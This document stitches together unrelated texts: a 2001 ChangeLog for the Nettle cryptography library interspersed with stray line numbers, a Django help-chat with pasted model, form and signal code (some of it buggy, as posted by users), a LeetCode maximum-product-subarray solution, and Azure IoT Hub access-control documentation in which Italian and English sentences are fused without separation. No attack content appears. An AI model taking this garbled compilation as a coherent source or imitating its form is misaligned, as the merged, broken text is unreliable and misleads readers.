* rsa-compat.c: Updated for new md5 and rsa conventions.
* rsa_md5.c: Represent a signature as an mpz_t, not a string.
Updated calls of md5 functions.
* rsa_sha1.c: Likewise.
* rsa.c (rsa_prepare_public_key): Renamed function, was
rsa_init_public_key.
(rsa_prepare_private_key): Renamed function, was
rsa_init_private_key.
* nettle.texinfo (Hash functions): Update for the changed
interface without *_final. Document sha256.
* testsuite/md5-test.m4, testsuite/sha1-test.m4,
testsuite/sha256-test.m4, testsuite/yarrow-test.c: Updated for new
hash function interface.
* yarrow256.c: Removed calls of sha256_final and and some calls of
sha256_init.
* md5-compat.c (MD5Final): Call only md5_digest.
* md5.c (md5_digest): Call md5_final and md5_init.
(md5_final): Declared static.
sha1.c, sha256.c: Analogous changes.
* bignum.c (nettle_mpz_get_str_256): Declare the input argument
const.
600 601 602 603 604 605
2001-12-14 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am (EXTRA_DIST): Added $(des_headers). Changed
dependencies for $(des_headers) to depend only on the source file
desdata.c, not on the executable.
606 607 608 609 610 611 612 613 614 615 616 617 618 619 620
2001-12-12 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.c (main): Updated testcase to match fixed
generator. Send verbose output to stdout, not stderr.
* yarrow256.c (yarrow_slow_reseed): Bug fix, update the fast pool
with the digest of the slow pool.
(yarrow256_init): Initialize seed_file and counter to zero, to
ease debugging.
2001-12-07 Niels Möller <nisse@cuckoo.hack.org>
* bignum.c (nettle_mpz_get_str_256): Fixed handling of leading
zeroes.
621 622 623 624 625 626 627 628 629 630 631 632 633
2001-12-05 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.c (main): Updated test to match the fixed
key event estimator.
* yarrow_key_event.c (yarrow_key_event_estimate): Fixed handling
of timing info.
* nettle.texinfo (Copyright): Say that under certain
circumstances, Nettle can be used as if under the LGPL.
* README: Added a paragraph on copyright.
634 635 636 637
2001-11-15 Niels Möller <nisse@cuckoo.hack.org>
* yarrow256.c (yarrow256_force_reseed): New function.
638 639 640 641 642 643 644 645
2001-11-14 Niels Möller <nisse@ehand.com>
* testsuite/yarrow-test.c (main): Use yarrow256_is_seeded.
* yarrow256.c (yarrow256_needed_sources): New function.
(yarrow256_is_seeded): New function.
(yarrow256_update): Use yarrow256_needed_sources.
646 647 648 649 650 651 652 653 654 655 656 657 658 659 660
2001-11-14 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/yarrow-test.out: Updated, to match the seed-file aware
generator.
* testsuite/yarrow-test.c: Updated expected_output. Check the seed
file contents at the end.
* yarrow256.c (yarrow256_seed): New function.
(yarrow_fast_reseed): Create new seed file contents.
2001-11-13 Niels Möller <nisse@cuckoo.hack.org>
* yarrow.h: Deleted yarrow160 declarations.
661 662 663 664 665
2001-11-02 Niels Möller <nisse@ehand.com>
* yarrow256.c (yarrow256_init): Fixed order of code and
declarations.
666 667
2001-10-30 Niels Möller <nisse@ehand.com>
668 669 670 671 672 673 674 675
* rsa-compat.h: Added real prototypes and declarations.
* Makefile.am (libnettle_a_SOURCES): Added rsa-compat.h and
rsa-compat.c.
* rsa-compat.c: New file, implementing RSA ref signature and
verification functions.
676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698
* configure.in: Check for libgmp. Deleted tests for SIZEOF_INT and
friends.
* rsa_sha1.c: New file, PKCS#1 rsa-sha1 signatures.
* rsa_md5.c: New file, PKCS#1 rsa-md5 signatures.
* rsa.c: New file with general rsa functions.
* Makefile.am (libnettle_a_SOURCES): Added rsa and bignum files.
* bignum.c, bignum.h: New file, with base256 functions missing in
gmp.
* testsuite/Makefile.am: Added bignum-test.
* testsuite/run-tests (test_program): Check the xit code more
carefully, and treat 77 as skip. This convention was borrowed from
autotest.
* testsuite/macros.m4: New macro SKIP which exits with code 77.
* testsuite/bignum-test.m4: New file.
699 700 701 702 703
2001-10-15 Niels Möller <nisse@ehand.com>
* testsuite/Makefile.am (EXTRA_DIST): Include rfc1750.txt in the
distribution.
704 705
2001-10-14 Niels Möller <nisse@cuckoo.hack.org>
706 707 708
* testsuite/des-test.m4: Added testcase taken from applied
cryptography.
709 710 711 712 713 714 715 716 717 718
* testsuite/yarrow-test.c: Use sha256 instead of sha1 for checking
input and output. Updated the expected values.
* yarrow256.c (YARROW_RESEED_ITERATIONS): New constant.
(yarrow_iterate): New function.
(yarrow_fast_reseed): Call yarrow_iterate.
* testsuite/yarrow-test.c: Added verbose flag, disabled by
default.
719 720 721 722 723 724 725 726
2001-10-12 Niels Möller <nisse@ehand.com>
* examples/nettle-benchmark.c: Added more ciphers.
* Makefile.am (SUBDIRS): Added the examples subdir.
* configure.in: Output examples/Makefile.
727 728 729 730
2001-10-12 Niels Möller <nisse@cuckoo.hack.org>
* examples/nettle-benchmark.c: New benchmarking program.
731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749
2001-10-10 Niels Möller <nisse@ehand.com>
* testsuite/yarrow-test.c: Open rfc1750.txt. Hash input and
output, and compare to expected values.
* testsuite/Makefile.am (CFLAGS): Don't disable optimization.
(run-tests): Set srcdir in the environment when running run-tests.
* testsuite/rfc1750.txt: Added this rfc as test input for yarrow.
* yarrow_key_event.c (yarrow_key_event_estimate): Check if
previous is zero.
(yarrow_key_event_init): Initialize previous to zero.
* yarrow256.c: Added debug some output.
* testsuite/yarrow-test.c (main): Better output of entropy
estimates at the end.
750 751 752 753 754 755 756 757 758 759 760 761 762 763 764
2001-10-09 Niels Möller <nisse@ehand.com>
* testsuite/Makefile.am (TS_PROGS): Added yarrow-test.
* testsuite/yarrow-test.c: New file.
* yarrow256.c (yarrow256_init): Initialize the sources.
(yarrow256_random): Fixed loop condition.
* yarrow.h (YARROW_KEY_EVENT_BUFFER): New constant.
* yarrow_key_event.c: New file.
* Makefile.am (libnettle_a_SOURCES): Added yarrow_key_event.c.
765 766
2001-10-08 Niels Möller <nisse@cuckoo.hack.org>
767 768
* yarrow.h (struct yarrow_key_event_ctx): New struct.
769 770 771
* yarrow256.c (yarrow_fast_reseed): Generate two block of output
using the old key and feed into the pool.
772 773 774
* yarrow.h (struct yarrow256_ctx): Deleted buffer, index and
block_count.
775 776 777
* yarrow256.c (yarrow_fast_reseed): New function.
(yarrow_slow_reseed): New function.
(yarrow256_update): Check seed/reseed thresholds.
778 779 780 781 782 783 784
785 786
2001-10-07 Niels Möller <nisse@cuckoo.hack.org>
787 788 789 790 791 792
* Makefile.am: Added yarrow files.
* yarrow256.c: New file, implementing Yarrow. Work in progress.
* sha256.c: New file, implementing SHA-256.
793 794 795 796 797 798 799 800 801
* testsuite/Makefile.am (CFLAGS): Added sha256-test.
* testsuite/sha256-test.m4: New testcases for SHA-256.
* shadata.c: New file, for generating SHA-256 constants.
* sha.h: Renamed sha1.h to sha.h, and added declarations for
SHA-256.
802 803 804 805 806 807 808 809
2001-10-05 Niels Möller <nisse@ehand.com>
* testsuite/aes-test.m4: Added a comment with NIST test vectors.
2001-10-04 Niels Möller <nisse@ehand.com>
* rsa.h, rsa-compat.h, yarrow.h: New files.
810 811 812 813
2001-09-25 Niels Möller <nisse@cuckoo.hack.org>
* Released version 1.0.
814 815 816 817 818 819 820 821 822 823 824 825 826 827 828
2001-09-25 Niels Möller <nisse@ehand.com>
* sha1.c: Include stdlib.h, for abort.
* md5.c: Include string.h, for memcpy.
* testsuite/Makefile.am (M4_FILES): New variable. Explicitly list
those C source files that should be generated by m4.
* configure.in: Changed package name from "libnettle" to "nettle".
* Makefile.am (EXTRA_DIST): Added .bootstrap.
* AUTHORS: Added a reference to the manual.
829 830 831 832 833
2001-09-25 Niels Möller <nisse@lysator.liu.se>
* des-compat.c (des_cbc_cksum): Bug fix, local variable was
declared in the middle of a block.
834 835 836 837 838
2001-09-19 Niels Möller <nisse@cuckoo.hack.org>
* nettle.texinfo (Compatibility functions): New section,
mentioning md5-compat.h and des-compat.h.
839 840 841 842
2001-09-18 Niels Möller <nisse@ehand.com>
* index.html: New file.
843 844
2001-09-16 Niels Möller <nisse@cuckoo.hack.org>
845 846
847 848 849 850 851 852 853 854
* testsuite/des-compat-test.c (cbc_data): Shorten to 32 bytes (4
blocks), the last block of zeroes wasn't used anyway.
* des-compat.c (des_compat_des3_decrypt): Decrypt in the right
order.
(des_ncbc_encrypt): Bug fixed.
(des_cbc_encrypt): Rewritten as a wrapper around des_ncbc_encrypt.
855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872
2001-09-14 Niels Möller <nisse@ehand.com>
* testsuite/des-compat-test.c: New file, copied from libdes
(freeswan). All implemented functions but des_cbc_cksum seems to
work now.
* testsuite/Makefile.am (TS_PROGS): Added des-compat-test.
* des-compat.c: Added libdes typedef:s. Had to remove all use of
const in the process.
(des_check_key): New global variable, checked by des_set_key.
* des.c (des_set_key): Go on and expand the key even if it is
weak.
* des-compat.c (des_cbc_cksum): Implemented.
(des_key_sched): Fixed return values.
873 874 875 876 877 878 879 880
2001-09-11 Niels Möller <nisse@cuckoo.hack.org>
* Makefile.am: Added des-compat.c and des-compat.h
* des-compat.c: Bugfixes, more functions implemented.
* des-compat.h: Define DES_ENCRYPT and DES_DECRYPT. Bugfixes.
881 882 883 884 885 886
2001-09-10 Niels Möller <nisse@ehand.com>
* nettle.texinfo (Copyright): Added copyright information for
serpent.
(Miscellaneous functions): Started writing documentation on the CBC
functions.
887
888
889 890
2001-09-09 Niels Möller <nisse@cuckoo.hack.org>
891 892 893 894 895 896 897 898 899
* testsuite/cbc-test.m4: Record intermediate values in a comment.
* testsuite/des3-test.m4: Likewise.
* testsuite/aes-test.m4: Added test case that appeared broken in
the cbc test.
* cbc.c (cbc_encrypt): Bug fix, encrypt block *after* XOR:ing the
iv.
900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917
* Makefile.am (libnettleinclude_HEADERS): Added cbc.h. Deleted
des3.h.
(libnettle_a_SOURCES): Added des3.c.
* testsuite/Makefile.am (TS_PROGS): Added des3-test and cbc-test.
* testsuite/cbc-test.m4: New testcase.
* testsuite/des3-test.m4: New testcase.
* cbc.h (CBC_CTX): New macro.
(CBC_ENCRYPT): New macro.
(CBC_DECRYPT): New macro.
* des.c (des_fix_parity): New function.
* des3.c: New file, implementing triple des.
918 919 920 921 922 923
2001-09-06 Niels Möller <nisse@cuckoo.hack.org>
* cbc.c, cbc.h: New files, for general CBC encryption.
* des-compat.h: Added some prototypes.
924 925 926 927 928 929 930 931 932 933 934 935 936 937
2001-09-05 Niels Möller <nisse@ehand.com>
* testsuite/Makefile.am (TS_PROGS): Added md5-compat-test.
* README: Copied introduction from the manual.
* configure.in: Bumped version to 1.0.
* Makefile.am (libnettleinclude_HEADERS): Added missing includes.
(libnettle_a_SOURCES): Added md5-compat.c and md5-compat.h.
* md5-compat.c, md5-compat.h: New files, implementing an RFC
1321-style interface.
938 939 940 941 942 943
2001-09-02 Niels Möller <nisse@cuckoo.hack.org>
* twofish.c (twofish_decrypt): Fixed for();-bug in the block-loop.
Spotted by Jean-Pierre.
(twofish_encrypt): Likewise.
944 945 946 947 948 949
2001-07-03 Niels Möller <nisse@ehand.com>
* testsuite/testutils.c: Include string.h.
* twofish.c: Include string.h.
950 951
2001-06-17 Niels Möller <nisse@lysator.liu.se>
952 953 954
* Makefile.am (des_headers): Dont use $(srcdir)/-prefixes as that
seems to break with GNU make 3.79.1.
955 956
* testsuite/testutils.c, testsuite/testutils.h: Use <inttypes.h>,
not <stdint.h>.
957
958
959 960
2001-06-17 Niels Möller <nisse@cuckoo.hack.org>
961 962 963 964
* Use <inttypes.h>, not <stdint.h>.
* blowfish.h (BLOWFISH_MAX_KEY_SIZE): Fixed, should be 56.
965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980
* Fixed copyright notices.
* Makefile.am (libnettle_a_SOURCES): Added desinfo.h and
desCode.h.
(info_TEXINFOS): Added manual.
(EXTRA_DIST): Added nettle.html.
(%.html): Added rule for building nettle.html.
* nettle.texinfo: New manual.
* configure.in: Bumped version to 0.2.
* testsuite/Makefile.am (TS_PROGS): Added cast128 test.
* Added CAST128.
981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027
* testsuite/serpent-test.m4: Added a few rudimentary tests
extracted from the serpent package.
* twofish.c: Adapted to nettle. Made constant tables const.
Deleted bytes_to_word and word_to_bytes; use LE_READ_UINT32 and
LE_WRITE_UINT32 instead.
(twofish_selftest): Deleted. Moved the tests to the external
testsuite.
(twofish_set_key): Don't silently truncate too large keys.
* sha1.c (sha1_update): Use unsigned for length.
* serpent.c (serpent_set_key): Read the key backwards. Fixed
padding (but there are no test vectors for key_size not a multiple
of 4).
(serpent_encrypt): Read and write data in the strange order used
by the reference implementation.
(serpent_decrypt): Likewise.
* macros.h (FOR_BLOCKS): New macro, taken from lsh.
* blowfish.h (struct blowfish_ctx): Use a two-dimensional array
for s.
* blowfish.c (initial_ctx): Arrange constants into a struct, to
simplify key setup.
(F): Deleted all but one definitions of the F function/macro.
Added a context argument, and use that to find the subkeys.
(R): Added context argument, and use that to find the subkeys.
(blowfish_set_key): Some simplification.
(encrypt): Deleted code for non-standard number of rounds. Deleted
a bunch of local variables. Using the context pointer for
everything should consume less registers.
(decrypt): Likewise.
* Makefile.am (libnettle_a_SOURCES): Added twofish.
2001-06-16 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/blowfish-test.m4: Fixed test.
* Added twofish implementation.
* blowfish.h (struct blowfish_ctx): Use the correct size for the p
array.
1028 1029
2001-06-15 Niels Möller <nisse@ehand.com>
1030 1031 1032
* testsuite/blowfish-test.m4: Fixed testcase, use correct key
length.
1033
* Makefile.am (libnettle_a_SOURCES): Added blowfish files.
1034 1035
1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047
* testsuite/blowfish-test.m4: Added one test, from GNUPG.
* Created blowfish.c and blowfish.h (from GNUPG via LSH). Needs
more work.
* aes.h: Fixed copyright notice to not mention GNU MP. XXX: Review
all nettle copyrights.
* testsuite/Makefile.am (TS_PROGS): Added tests for twofish and
blowfish.
1048 1049 1050 1051
2001-06-13 Niels Möller <nisse@ehand.com>
* Makefile.am (libnettle_a_SOURCES): Added serpent files.
1052 1053
2001-06-12 Niels Möller <nisse@cuckoo.hack.org>
1054 1055 1056
* des.c (des_encrypt, des_decrypt): Assert that the key setup was
successful.
1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068
* testsuite/Makefile.am (TS_PROGS): Added tests for des and sha1.
* testsuite/sha1-test.m4: New file.
* testsuite/des-test.m4: New file.
* Added SHA1 files.
* Added desCore files.
* Makefile.am: Added desCore and sha1.
1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081
2001-04-17 Niels Möller <nisse@cuckoo.hack.org>
* install-sh: Copied the standard install script.
* testsuite/Makefile.am (CFLAGS): Disable optimization. Add
$(top_srcdir) to the include path.
(EXTRA_DIST): Added testutils.h, testutils.c and run-tests.
(run-tests): Fixed path to run-tests.
* Makefile.am (EXTRA_DIST): Added memxor.h.
(libnettleinclude_HEADERS): Install headers in
$(libnettleincludedir).
1082 1083 1084 1085
2001-04-13 Niels Möller <nisse@cuckoo.hack.org>
* Initial checkin.
|
Python channel too. Are you new to Django?
My models:
class Clients(models.Model):
id_client = models.BigIntegerField(primary_key=True, blank=True)
...
class Hosts(models.Model):
id_host = models.BigIntegerField(primary_key=True)
id_client = models.ForeignKey('Clients', models.DO_NOTHING, db_column='id_client', related_name='host_client_id')
...
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class Registrationform(UserCreationForm):
email = forms.EmailField(required = True)
class Meta:
model =User
fields =(
'username',
'first_name',
'last_name',
'email',
'password1',
'password2'
)
def save(self,commit=True):
user=super(RegistrationForm,self).save(commit=False)
user.first_name=self.cleaned_data['first_name']
user.last_name=self.cleaned_data['last_name']
user.email=self.clelaned_data['email']
if commit:
user.save()
return user
reverse(‘weather’, kwargs={‘current_location’: some_value, 'booking_ location’: another_value}) I am getting a NoReverseMatch exception. urls.py and views.py media url?
I am using Django Rest Framework and have a model with a timestamp field that I want to group by. The outcome I would like is to have something like {tournament_count: 2, start_date: datetime object, tournaments: [{...tournaments model representations}]} I currently have a queryset returning the tournament_count and start_date but now I want to drop in the actual tournaments as well.
queryset.annotate(
start_date=Trunc("time_stamp", "day", output_field=DateTimeField())
)
.values("start_date")
.annotate(tournament_count=Count("id")).order_by()
I can't figure out a solution that will work well and scale well. Any thoughts?
Hello people, has anyone here managed to create user profiles while using Django allauth for authentication. I am having challenges with user has no profile errors and RelatedObjectDoesNotExist a yet I have a Profile model with OnetoOne relationship with User model and a profile view plus use of Django signals for profile creation and saving
Users/views.py
`views.py
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import ProfileUpdateForm
@login_required
def profile(request):
if request.method == 'POST':
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if p_form.is_valid():
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'p_form': p_form
}
return render(request, 'profile.html', context)
`
MODELS.PY
`
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
image = models.ImageField(default='default.jpg', upload_to='profile_pics')
role = models.CharField(max_length=25,choices=role, default='Freelancer')
def __str__(self):
return f'{self.user.username} Profile'
`
SIGNALS.PY
`
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
profile.save()
@receiver(post_save, sender=User)
def save_profile(sender, instance, **kwargs):
instance.profile.save()
`
|
Description
Given an integer array nums, find the contiguous subarray within an array (containing at least one number) which has the largest product.
Example 1:
Input:[2,3,-2,4]Output:6Explanation:[2,3] has the largest product 6.
Example 2:
Input:[-2,0,-1]Output:0Explanation:The result cannot be 2, because [-2,-1] is not a subarray.
Explanation
need to keep track of min product and max product because both positive and negative numbers exist.
Python Solution
class Solution:
def maxProduct(self, nums: List[int]) -> int:
if not nums:
return 0
result = nums[0]
min_product = max_product = 1
for num in nums:
choices = num, min_product * num, max_product * num
max_product = max(choices)
min_product = min(choices)
result = max(result, max_product)
return result
Time complexity: ~N
Space complexity: ~1
|
Controllare l'accesso all'hub IoTControl access to IoT Hub
Questo articolo illustra le opzioni per la protezione dell'hub IoT.This article describes the options for securing your IoT hub. L'hub IoT usa le autorizzazioni per concedere l'accesso a ogni endpoint dell'hub stesso.IoT Hub uses permissions to grant access to each IoT hub endpoint. Le autorizzazioni limitano l'accesso a un hub IoT in base alla funzionalità.Permissions limit the access to an IoT hub based on functionality.
Questo articolo descrive:This article introduces:
Le diverse autorizzazioni che è possibile concedere a un'app per dispositivo o back-end per accedere all'hub IoT.The different permissions that you can grant to a device or back-end app to access your IoT hub.
Il processo di autenticazione e i token usati per verificare le autorizzazioni.The authentication process and the tokens it uses to verify permissions.
Come definire l'ambito delle credenziali per limitare l'accesso a risorse specifiche.How to scope credentials to limit access to specific resources.
Supporto dell'hub IoT per i certificati x.509.IoT Hub support for X.509 certificates.
Meccanismo di autenticazione personalizzata del dispositivo che usa gli schemi di autenticazione o i registri di identità del dispositivo esistenti.Custom device authentication mechanisms that use existing device identity registries or authentication schemes.
Nota
Alcune delle funzionalità indicate in questo articolo, come la messaggistica da cloud a dispositivo, i dispositivi gemelli e la gestione dei dispositivi, sono disponibili solo nel livello Standard dell'hub IoT.Some of the features mentioned in this article, like cloud-to-device messaging, device twins, and device management, are only available in the standard tier of IoT Hub. Per altre informazioni sui livelli Basic e Standard dell'hub IoT, vedere come scegliere il livello corretto dell'hub IoT.For more information about the basic and standard IoT Hub tiers, see How to choose the right IoT Hub tier.
È necessario avere le autorizzazioni appropriate per accedere agli endpoint dell'hub IoT.You must have appropriate permissions to access any of the IoT Hub endpoints. Un dispositivo, ad esempio, deve includere un token contenente le credenziali di sicurezza con ogni messaggio inviato all'hub IoT.For example, a device must include a token containing security credentials along with every message it sends to IoT Hub.
Controllo dell'accesso e autorizzazioniAccess control and permissions
Criteri di accesso condivisi a livello di hub IoT.IoT hub-level shared access policies. I criteri di accesso condiviso possono concedere qualsiasi combinazione di autorizzazioni.Shared access policies can grant any combination of permissions. È possibile definire i criteri nel portale di Azure a livello di codice tramite le API REST di risorsa dell'hub IoT o tramite il comando dell'interfaccia della riga di comando az iot hub policy.You can define policies in the Azure portal, programmatically by using the IoT Hub Resource REST APIs, or using the az iot hub policy CLI. Un hub IoT appena creato ha i criteri predefiniti seguenti:A newly created IoT hub has the following default policies:
Criterio di accesso condivisoShared Access Policy
AutorizzazioniPermissions
iothubowneriothubowner Tutte le autorizzazioniAll permission serviceservice Autorizzazioni ServiceConnectServiceConnectpermissions devicedevice Autorizzazioni DeviceConnectDeviceConnectpermissions registryReadregistryRead Autorizzazioni RegistryReadRegistryReadpermissions registryReadWriteregistryReadWrite Autorizzazioni RegistryReadeRegistryWriteRegistryReadandRegistryWritepermissions
Credenziali di sicurezza specifiche del dispositivo.Per-Device Security Credentials. Ogni hub IoT contiene un registro delle identità. Per ogni dispositivo presente in questo registro delle identità è possibile configurare credenziali di sicurezza che concedono autorizzazioniDeviceConnectcon ambito agli endpoint di dispositivo corrispondenti.Each IoT Hub contains an identity registry For each device in this identity registry, you can configure security credentials that grantDeviceConnectpermissions scoped to the corresponding device endpoints.
Ad esempio, in una soluzione IoT tipica:For example, in a typical IoT solution:
Il componente di gestione dei dispositivi usa i criteri registryReadWrite.The device management component uses theregistryReadWritepolicy.
Il componente processore di eventi usa i criteri service.The event processor component uses theservicepolicy.
Il componente della logica di business di runtime del dispositivo usa i criteri service.The run-time device business logic component uses theservicepolicy.
I singoli dispositivi si connettono usando le credenziali archiviate nel registro delle identità dell'hub IoT.Individual devices connect using credentials stored in the IoT hub's identity registry.
AuthenticationAuthentication
L'hub IoT di Azure concede l'accesso agli endpoint tramite la verifica di un token rispetto ai criteri di accesso condiviso e alle credenziali di sicurezza del registro delle identità.Azure IoT Hub grants access to endpoints by verifying a token against the shared access policies and identity registry security credentials.
Le credenziali di sicurezza, ad esempio le chiavi asimmetriche, non vengono mai trasmesse in rete.Security credentials, such as symmetric keys, are never sent over the wire.
Nota
Il provider di risorse dell'hub IoT di Azure viene protetto tramite la sottoscrizione di Azure, analogamente a tutti i provider in Azure Resource Manager.The Azure IoT Hub resource provider is secured through your Azure subscription, as are all providers in the Azure Resource Manager.
Per altre informazioni sulla creazione e sull'uso di token di sicurezza, vedere Token di sicurezza dell'hub IoT.For more information about how to construct and use security tokens, see IoT Hub security tokens.
Specifiche del protocolloProtocol specifics
Ogni protocollo supportato, ad esempio MQTT, AMQP e HTTPS, trasporta i token in modo diverso.Each supported protocol, such as MQTT, AMQP, and HTTPS, transports tokens in different ways.
Quando si usa MQTT, il pacchetto CONNECT ha deviceId come ClientId, {iothubhostname}/{deviceId} nel campo Username e un token di firma di accesso condiviso nel campo Password.When using MQTT, the CONNECT packet has the deviceId as the ClientId, {iothubhostname}/{deviceId} in the Username field, and a SAS token in the Password field. {iothubhostname} deve essere il record CName completo dell'hub IoT, ad esempio contoso.azure-devices.net.{iothubhostname} should be the full CName of the IoT hub (for example, contoso.azure-devices.net).
Se si usa la sicurezza basata sulle attestazioni AMQP, lo standard specifica come trasmettere questi token.If you use AMQP claims-based-security, the standard specifies how to transmit these tokens.
Per SASL PLAIN username può essere:For SASL PLAIN, the username can be:
{policyName}@sas.root.{iothubName}nel caso di token a livello di hub IoT.{policyName}@sas.root.{iothubName}if using IoT hub-level tokens.
{deviceId}@sas.{iothubname}ne caso di token con ambito relativo al dispositivo.{deviceId}@sas.{iothubname}if using device-scoped tokens.
In entrambi i casi, il campo della password contiene il token, come descritto in Token di sicurezza dell'hub IoT.In both cases, the password field contains the token, as described in IoT Hub security tokens.
Il protocollo HTTPS implementa l'autenticazione includendo un token valido nell'intestazione della richiesta Authorization .HTTPS implements authentication by including a valid token in the Authorization request header.
EsempioExample
Nome utente (per DeviceId viene fatta distinzione tra maiuscole e minuscole): iothubname.azure-devices.net/DeviceIdUsername (DeviceId is case-sensitive): iothubname.azure-devices.net/DeviceId
Password (è possibile generare un token di firma di accesso condiviso con il comando di estensione dell'interfaccia della riga di comando az iot hub generate-sas-token o con Azure IoT Tools per Visual Studio Code):Password (You can generate a SAS token with the CLI extension command az iot hub generate-sas-token, or the Azure IoT Tools for Visual Studio Code):
SharedAccessSignature sr=iothubname.azure-devices.net%2fdevices%2fDeviceId&sig=kPszxZZZZZZZZZZZZZZZZZAhLT%2bV7o%3d&se=1487709501
Nota
Gli Azure IoT SDK generano automaticamente i token durante la connessione al servizio.The Azure IoT SDKs automatically generate tokens when connecting to the service. In alcuni casi, gli Azure IoT SDK non supportano tutti i protocolli o tutti i metodi di autenticazione.In some cases, the Azure IoT SDKs do not support all the protocols or all the authentication methods.
Considerazioni speciali su SASL PLAINSpecial considerations for SASL PLAIN
Quando si usa SASL PLAIN con AMQP, un client che si connette a un hub IoT potrà usare un singolo token per ogni connessione TCP.When using SASL PLAIN with AMQP, a client connecting to an IoT hub can use a single token for each TCP connection. Quando il token scade, la connessione TCP si disconnette dal servizio e attiva una riconnessione.When the token expires, the TCP connection disconnects from the service and triggers a reconnection. Questo comportamento non genera problemi per un'app back-end, ma è dannoso per un'app per dispositivi per i motivi seguenti:This behavior, while not problematic for a back-end app, is damaging for a device app for the following reasons:
I gateway si connettono in genere per conto di molti dispositivi.Gateways usually connect on behalf of many devices. Quando si usa SASL PLAIN, devono creare una connessione TCP distinta per ogni dispositivo che si connette a un hub IoT.When using SASL PLAIN, they have to create a distinct TCP connection for each device connecting to an IoT hub. Questo scenario aumenta in modo considerevole il consumo energetico e delle risorse di rete e incrementa la latenza della connessione di ogni dispositivo.This scenario considerably increases the consumption of power and networking resources, and increases the latency of each device connection.
L'aumento dell'uso delle risorse per la riconnessione dopo la scadenza di ogni token influisce negativamente sui dispositivi vincolati alle risorse.Resource-constrained devices are adversely affected by the increased use of resources to reconnect after each token expiration.
Definire l'ambito delle credenziali a livello di hub IoTScope IoT hub-level credentials
È possibile definire l'ambito dei criteri di sicurezza a livello di hub IoT creando token con URI di risorsa con limitazioni.You can scope IoT hub-level security policies by creating tokens with a restricted resource URI. L'endpoint per l'invio di messaggi da dispositivo a cloud da un dispositivo, ad esempio, è /devices/{deviceId}/messages/events.For example, the endpoint to send device-to-cloud messages from a device is /devices/{deviceId}/messages/events. È anche possibile usare criteri di accesso condiviso a livello di hub IoT con autorizzazioni DeviceConnect per firmare un token il cui valore resourceURI è /devices/{deviceId} .You can also use an IoT hub-level shared access policy with DeviceConnect permissions to sign a token whose resourceURI is /devices/{deviceId}. Questo approccio crea un token che può essere usato solo per l'invio di messaggi per conto del dispositivo deviceId.This approach creates a token that is only usable to send messages on behalf of device deviceId.
Questo meccanismo è simile ai criteri dell'entità di pubblicazione di Hub eventi e consente di implementare metodi di autenticazione personalizzati.This mechanism is similar to the Event Hubs publisher policy, and enables you to implement custom authentication methods.
Token di sicurezzaSecurity tokens
Hub IoT usa i token di sicurezza per autenticare i dispositivi e i servizi ed evitare l'invio in rete delle chiavi.IoT Hub uses security tokens to authenticate devices and services to avoid sending keys on the wire. Inoltre, i token di sicurezza hanno una validità limitata in termini di tempo e portata.Additionally, security tokens are limited in time validity and scope. Gli Azure IoT SDK generano automaticamente i token senza richiedere una configurazione speciale.Azure IoT SDKs automatically generate tokens without requiring any special configuration. In alcuni scenari è necessario generare e usare direttamente i token di sicurezza.Some scenarios do require you to generate and use security tokens directly. Tali scenari includono:Such scenarios include:
L'uso diretto di superfici MQTT, AMQP o HTTPS.The direct use of the MQTT, AMQP, or HTTPS surfaces.
L'implementazione del modello di servizio token, come descritto in Autenticazione personalizzata del dispositivo.The implementation of the token service pattern, as explained in Custom device authentication.
Formato del token di sicurezzaSecurity token structure
I token di sicurezza consentono di concedere a dispositivi e servizi l'accesso con limite temporale a funzionalità specifiche dell'hub IoT.You use security tokens to grant time-bounded access to devices and services to specific functionality in IoT Hub. Per ottenere l'autorizzazione per connettersi all'hub IoT, i dispositivi e i servizi devono inviare i token di sicurezza firmati con una chiave di accesso condiviso o una chiave simmetrica.To get authorization to connect to IoT Hub, devices and services must send security tokens signed with either a shared access or symmetric key. Tali chiavi vengono archiviate con un'identità del dispositivo nel registro delle identità.These keys are stored with a device identity in the identity registry.
Un token firmato con una chiave di accesso condiviso concede l'accesso a tutte le funzionalità associate alle autorizzazioni dei criteri di accesso condiviso.A token signed with a shared access key grants access to all the functionality associated with the shared access policy permissions. Un token firmato con una chiave simmetrica dell'identità dispositivo concede solo l'autorizzazione DeviceConnect per l'identità del dispositivo associato.A token signed with a device identity's symmetric key only grants the DeviceConnect permission for the associated device identity.
Il token di sicurezza ha il formato seguente:The security token has the following format:
SharedAccessSignature sig={signature-string}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI}
I valori previsti sono i seguenti:Here are the expected values:
valoreValue DescrizioneDescription
{signature}{signature} Stringa della firma HMAC-SHA256 nel formato: {URL-encoded-resourceURI} + "\n" + expiry.An HMAC-SHA256 signature string of the form: {URL-encoded-resourceURI} + "\n" + expiry. Importante: la chiave viene decodificata dalla codifica Base64 e usata come chiave per eseguire il calcolo di HMAC-SHA256.Important: The key is decoded from base64 and used as key to perform the HMAC-SHA256 computation.
